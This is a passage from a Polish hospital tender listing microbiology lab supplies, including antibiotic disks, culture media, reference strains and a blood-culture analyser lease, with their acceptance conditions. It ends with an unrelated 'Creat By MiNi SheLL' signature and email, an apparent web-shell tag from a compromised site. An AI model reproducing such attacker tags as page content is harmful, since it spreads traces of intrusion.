DOXYCYCLINE 30	szt.	300											3.Każda fiolka musi posiadać w opakowaniu indywidualny pochłaniacz wilgoci.
PENICILIN 10	szt.	100											
CEPHALEXIN 30	szt.	100											4.Krążki muszą posiadać na swojej powierzchni wyrażnie nadrukowany skrót międzynarodowej nazwy oraz nie zmieniające się stężenie antybiotyku według CLSI/EUCAST.
AMPICYLIN 2	szt.	100											
TEICOPLANIN 30	szt.	50											
IMIPENEM 10	szt.	200											5.Każda fiolka musi posiadać etykietę z nazwą antybiotyku, jego stężeniem, datą ważności i nr serii oraz nazwą producenta.
CHLORAMPHENICOL 30	szt.	300											
CEPHAZOLINE 30	szt.	50											
CEFEPIM 30	szt.	300											6. Termin ważności krążków z antybiotykami min. 1 rok
CEFPHADROXIL 30	szt.	100											
OPTOCHIN DO RÓŻNICOWANIA PNEUMOKOKÓW 5	szt.	200											7.Zamawiający wymaga dostarczenia certyfikatu ISO 13485:2003
NOVOBIOCIN DO HAMOWANIA WZROSTU GRONKOWCÓW KOAGULAZOUJEMNYCH 30	szt.	50											
NORFLOXACIN 10	szt.	200											
NITROFURANTOINE 100	szt.	300											8.Zamawiający wymaga dostarczenia do oferty próbki produktu - jednej fiolki z krążkami dowolnego antybiotyku w celu sprawdzenia spełnionych warunków granicznych.
TOBRAMYCINE 10	szt.	100											9.Zamawiający wymaga dołączenia do oferty opinii KORLD.
PIPERACILIN 30	szt.	100											
OXACILIN 1	szt.	50											10. Wszystkie krążki muszą mieć jednakową temperaturę przechowywania od -20 do +8 stopni celsjusza
NEOMYCIN 30	szt.	150											
CEFTAZIDIME 10	szt.	50											
GENTAMYCIN 10	szt.	300											
ERYTHROMYCIN 15	szt.	400											
SULFAMETHAXAZOLE/TRIMETHOPRIM 1,25/23,75	szt.	500											
CLINDAMYCIN 2	szt.	300											
CIPROFLOXACIN 5	szt.	500											
CEFOTAXIME 5	szt.	50											
CEFUROXIME 30	szt.	300											
CEFTAZIDIME 30	szt.	100											
CEFOTAXIME 30	szt.	200											
CEFACLOR 30	szt.	200											
AZTREONAM 30	szt.	100											
CEFINAZA DO BADANIA OBECNOŚCI BETALAKTAMAZY 	szt.	50											
CEFOXITIN 30	szt.	400											
TRIMETOPRIM 5	szt.	50											
NETILMYCIN 10	szt.	100											
TETRACYCLINE 30	szt.	200											
TICARCILIN 75	szt.	50											
TICARCILIN+CLAVULONIC 75/10	szt.	50											
VANCOMYCIN 5	szt.	200											
RIFAMPICIN 5	szt.	50											
MINOCYKLINA 30	szt.	50											
KWAS FUSYDOWY 10	szt.	50											
AMPICILIN/SULFBACTAM 10/10	szt.	100											
OFLOXACIN 5	szt.	50											
MUPIROCYNA 200	szt.	50											
MEROPENEM 10	szt.	100											
MOXIFLOKSACYNA 5	szt.	50											
AZYTROMYCYNA 15	szt.	100											
KW.NALIDEKSOWY 30	szt.	50											
CEFPODOKSYM 10	szt.	50											
LEVOFLOXACIN 5	szt.	50											
CEFOPERAZON+SULFBACTAM 105	szt.	100											
TIGECYCLINE 15	szt.	50											
BACITRACIN - RÓŻNICOWANIE STREPTOCOCCUS GR. A	szt.	100											
KRĄŻKI DO TESTU NA OXYDAZĘ CYTOCHROMOWĄ	szt.	100											
KRĄŻKI Z CZYNNIKIEM X DO RÓZNICOWANIA HAEMOPHILUS	szt.	50											
KRĄŻKI Z CZYNNIKIEM V DO RÓZNICOWANIA HAEMOPHILUS	szt.	50											
KRĄŻKI Z CZYNNIKIEM X i V DO RÓZNICOWANIA HAEMOPHILUS	szt.	50											
LINEZOLID 10	szt.	50											
CHINUPRISTIN/DALFOPRISTIN	szt.	50											
GENTAMYCIN -30	szt.	150											
ERTAPENEM	szt.	50											
DORIPENEM	szt.	50											
KRĄŻKI JAŁOWE BEZ ANTYBIOTYKU (CZYSTE)	szt.	500											
PODŁOŻA I TESTY DIAGNOSTYCZNE	J.M.	ILOŚĆ NA ROK	ILOŚĆ W OPAKOWANIU	ILOŚĆ OPAKOWAŃ	CENA NETTO 1 SZT.	CENA BRUTTO 1 SZT.	CENA NETTO 1 OP.	CENA BRUTTO 1 OP.	WARTOŚĆ NETTO	VAT		WARTOŚĆ BRUTTO	WARUNKI GRANICZNE
										%	zł		
Podłoże Muller-Hinton -  Podłoża gotowe na płytkach	szt.	1 200											1.Wszystkie podłoża na płytkach muszą pochodzić od producenta wytwarzającego podłoża nieuwodnione.
Agar krwawy-  Podłoża gotowe na płytkach	szt.	3 000											2.Płytki Petriego muszą posiadać średnicę 90 mm. 
Podłoże Chapmana -  Podłoża gotowe na płytkach	szt.	700											3.Gotowe podłoża na płytkach muszą być rozlane na płytki z żebrami wentylacyjnymi i posiadać na każdej płytce czytelną datę ważności, numer serii produkcji, nazwę podłoża i nazwę producenta.
Podłoże Mac Conkey-  Podłoża gotowe na płytkach	szt.	700											4.Płytki muszą być pakowane szczelnie po 10 szt. w folię, a następnie w pudełka kartonowe dla zabezpieczenia przed uszkodzeniami mechanicznymi.
Podłoże MRSA z cefoksytyną-  Podłoża gotowe na płytkach	szt.	50											5.Do każdej dostawy musi być dołączony certyfikat kontroli jakości dla każdej serii dostarczonego podłoża, określający spełnienie wymagań wg. CLSI/EUCAST.
Podłoże -Chromagar -Enterobacteriaceae -  Podłoża gotowe na płytkach	szt.	500											6.Wszystkie podłoża muszą mieć gładką powierzchnię pozbawioną jakichkolwiek nierówności, do reklamacji jakości całej dostarczanej serii danego podłoża.
Podłoże- Enterococosel agar-  Podłoża gotowe na płytkach	szt.	500											7.Zamawiający wymaga dostarczenia z ofertą przetargową dokumentów (dopuszcza się w formie elektronicznej na płycie CD) :
Podłoże Sabouraud+chlor.+gentamyc.-  Podłoża gotowe na płytkach	szt.	500											 -deklaracji zgodności dla każdej oferowanej pozycji z asortymentu podłoży na płytkach,
Podłoże- Agar czekoladowy z bacytracyną-  Podłoża gotowe na płytkach	szt.	200											 -przykładowych certyfikatów analizy - kontroli jakości,
Podłoże- Agar czekoladowy z polivitexem-  Podłoża gotowe na płytkach	szt.	200											 -kart charakterystyki preparatu niebezpiecznego,
Podłoże chromogenne do izolacji enterobacteriaceae opornych na karbapenemy - Podłoże gotowe na płytkach	szt.	120											
Podłoże SS -  Podłoża gotowe na płytkach	szt.	300											 -certyfikatu ISO 13485.
Podłoża Chromagar-Salmonella-  Podłoża gotowe na płytkach	szt.	300											8.Okres przydatności do użytku wszystkich podłoży gotowych musi być nie krótszy niż 30 dni.                                                       
Podłoże Muller-Hinton z 5% krwią końską i 20 mg/l beta-NAD do lekowrażliwości organizmów wymagających - Podłoża gotowe na płytkach	szt.	200											
Bulion tryptozowo sojowy - Podłoża gotowe w probówkach	szt.	1000											
Bulion Todd-Hewitt z gentamycyną i kawsem nalidyksowym do hodowli GBS - Podłoża gotowe w probówkach	szt.	300											
Bulion selninowo fosforanowy - Podłoża gotowe w probówkach	szt.	300											                                            
Generator CO2	szt.	300											1.Generatory do hodowli bakterii wymagających atmosfery wzbogaconej w CO 2 w pojemnikach bez konieczności dodawania wody.
Generator do hodowli bakterii beztlenowych	szt.	50											1.Generatory do hodowli bakterii beztlenowych w pojemnikach bez konieczności dodawania wody.
Zestaw barwników do barwienia metodą Grama	zestaw	1											
Szybki test aglutynacyjny do identyfikacji Staph. Aureus 	op.	10											
Szybki test aglutynacyjny do identyfikacji Salmonella 	op.	2											
Test aglutynacji do oznaczania przynależności paciorkowców beta-hemolizujących do grup serologicznych A, B, C, D, F, G	op.	3											
 Test aglutynacyjny do wykrywania białka PBP 2 w szczepach metycylinoopornych Staph. Aureus (MRSA) i gronkowców koagulazo-ujemnych (MRCNS)	op.	3											
Płytki odciskowe do kontroli mikrobiologicznej powierzchni dezynfekowanych  metodą kontaktową z podłożem zawierającym neutralizatory związków hamujących wzrost bakterii - podłoża gotowe na płytkach	szt.	1000											
EDTA - inhibitor MBL - w probówkach po 2 ml	szt.	12											
 Kwas fenyloboronowy inhibitor KPC - w probówkach po 2 ml	szt.	12											
Osocze królicze do wykrywania koagulazy Stap. Aureus	op.	1											
sterylne pałeczki do wymazów w probówkach z podłożem transportowym AMIE kl. Iia 													instrukcja obsługi wymazówki na opakowaniu zbiorczym - probówki z etykietą w jęz. polskim umożliwiającą opisanie imieniem i nazwiskiem pacjenta i rodzajem materiału, zgodne z rozporządzeniem MZ z 5 listopada 2010 w sprawie klasyfikacji wyrobów medycznych, Ustawą o wyrobach medycznych z dn 20 maja 2010, zamawiający wymaga dostarczenia potwierdzenia przeżywalności bakterii  w 0, 24, 48, 72 godzinie przechowywania wydanego przez niezależną jednostkę certryfikującą
Sporal A - biologiczny wskażnik procesu sterylizacji parą wodną w autoklawie - pasek bibuły nasączony zawiesiną Geobacillus stearothermophilus	szt.	20											termin ważności min 6 miesięcy
SZCZEPY WZORCOWE DO KONTROLI JAKOŚCI MIKROBIOLOGICZNEJ	J.M.	ILOŚĆ	ILOŚĆ W OPAKOWANIU	ILOŚĆ OPAKOWAŃ	CENA NETTO 1 SZT.	CENA BRUTTO 1 SZT.	CENA NETTO 1 OP.	CENA BRUTTO 1 OP.	WARTOŚĆ NETTO	VAT		WARTOŚĆ BRUTTO	WARUNKI GRANICZNE
										%	zł		
Enterococcus faecalis, ATCC 29212	op.	1											1.Zamawiający wymaga dostarczenia z ofertą przetargową, instrukcji postępowania w języku polskim.
Escherichia coli, ATCC 25922	op.	1											2.Szczepy muszą pochodzić od tego samego producenta co podłoża: Columbia agar z 5% krwią baranią (agar krwawy), Mueller Hinton II agar,agar czekoladowy z bacytracyną, bulion tryptozowo-sojowy oraz krążki antybiotykowe z grupy cefalosporyn, karbapenemów, aminoglikozydów i  tetracyklin.
Haemophilus influenza, ATCC 9934	op.	1											
Pseudomonas aeruginosa, ATCC 27853	op.	1											
Staphylococcus aureus, ATCC 29213	op.	1											3.Szczepy muszą pochodzić z maksymalnie 3 lub 4 pasażu kolekcji ATCC i mieć postać liofilizowanych krążków, gotowych do użycia na podłożu agarowym lub w bulionie.
Streptococcus pneumoniae ATCC 49619 	op.	1											4.Termin ważności min. 6 m-cy.
System do przechowywania drobnoustrojów  w stanie zamrożonym typu Microbank/Kriobank/Viabank itp.	op.	1											opakowanie zbiorcze zawierające od 40 do 80 fiolek termin ważności min 12 miesięcy
PASKI NASĄCZONE GRADIENTEM STĘŻEŃ ANTYBIOTYKU DO ILOŚCIOWEGO OZNACZANIA MINIMALNEGO STĘŻENIA HAMUJĄCEGO WZROST BAKTERII	szt.	150											paski plastikowe pakowane pojedynczo z pochłaniaczem wilgoci w opakaowaniach zbiorczych nie większych niż 10 szt. Antybiotyki w zależności od potrzeb zamawiającego zamawiający wymaga pozytywnej opinii KORLD
1	Oferowany asortyment musi spełniać wymagania ustawy z dnia 20 maja 2010 roku o wyrobach medycznych.															
2	Pakiet stanowi niepodzielną całość i nie podlega podziałowi															
3	Niespełnienie warunków granicznych oraz dodatkowych spowoduje odrzucenie oferty.															
4	W kolumnie Numer kat. Wykonawca zobowiązany jest wpisać numer katalogowy każdego produktu stanowiącego przedmiot zamówienia w sposób umożliwiający identyfikację dostarczonego towaru z fakturą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie Nr 14: 	Przedmiotem zamówienia jest dostawa butelek do posiewów krwi i płynów ustrojowych z dzierżawą analizatora- wg Załącznika Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podłoża / butelki / do posiewów krwi innych płynów ustrojowych w warunkach tlenowych z inhibitorem antybiotyków	szt.	200									Certyfikat ISO 13485 dla podłóż jako wyrobów do diagnostyki in vitro.
Podłoża / butelki / do posiewów krwi innych płynów ustrojowych w warunkach beztlenowych z inhibitorem antybiotyków	szt.	200									Certyfikat ISO 13485 dla podłóż jako wyrobów do diagnostyki in vitro.
Podłoże pediatryczne	szt.	50									Certyfikat ISO 13485 dla podłóż jako wyrobów do diagnostyki in vitro.
1	Oferowany asortyment musi spełniać wymagania ustawy z dnia 20 maja 2010 roku o wyrobach medycznych.													
2												
2	Pakiet stanowi niepodzielną całość i nie podlega podziałowi													
3	Niespełnienie warunków granicznych oraz dodatkowych spowoduje odrzucenie oferty.													
4	W kolumnie Numer kat. zobowiązany jest wpisać numer katalogowy każdego produktu stanowiącego przedmiot zamówienia w sposób umożliwiający identyfikację dostarczonego towaru z fakturą													
PARAMETRY GRANICZNE ANALIZATORA
1	Możliwość umieszczania w analizatorze materiałów preinkubowanych.                      									
2	Możliwość prowadzenia hodowli i detekcji wzrostu drobnoustrojów w obrębie jednego aparatu.									
3	Minimalny zakres czynności manualnych - wprowadzanie danych przez czytnik kodów paskowych.									
4	Brak procedury codziennego rozruchu aparatu.									
5	Zachowanie ciągłości pomiarów i utrzymywanie stałej temperatury inkubacji.									
6	Natychmiastowa sygnalizacja próby dodatniej-sygnał dźwiękowy i świetlny oraz tych, których czas inkubacji dobiegł końca.									
7	Pojemność 50- 120 miejsc pomiarowych.									
8	Analizator posiada Deklarację Zgodności CE.									
9	Ciągły monitoring hodowli: pomiary co najmniej 4 razy na godz.									
10	Kontrola stanu hodowli na podstawie co najmniej dwóch różnych parametrów.									
11	Instrukcja w języku polskim.									
12	Wliczony w dzierżawę serwis do 24 h od zgłoszenia do usunięcia awarii.									
13	Szkolenie w zakresie obsługi w siedzibie Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com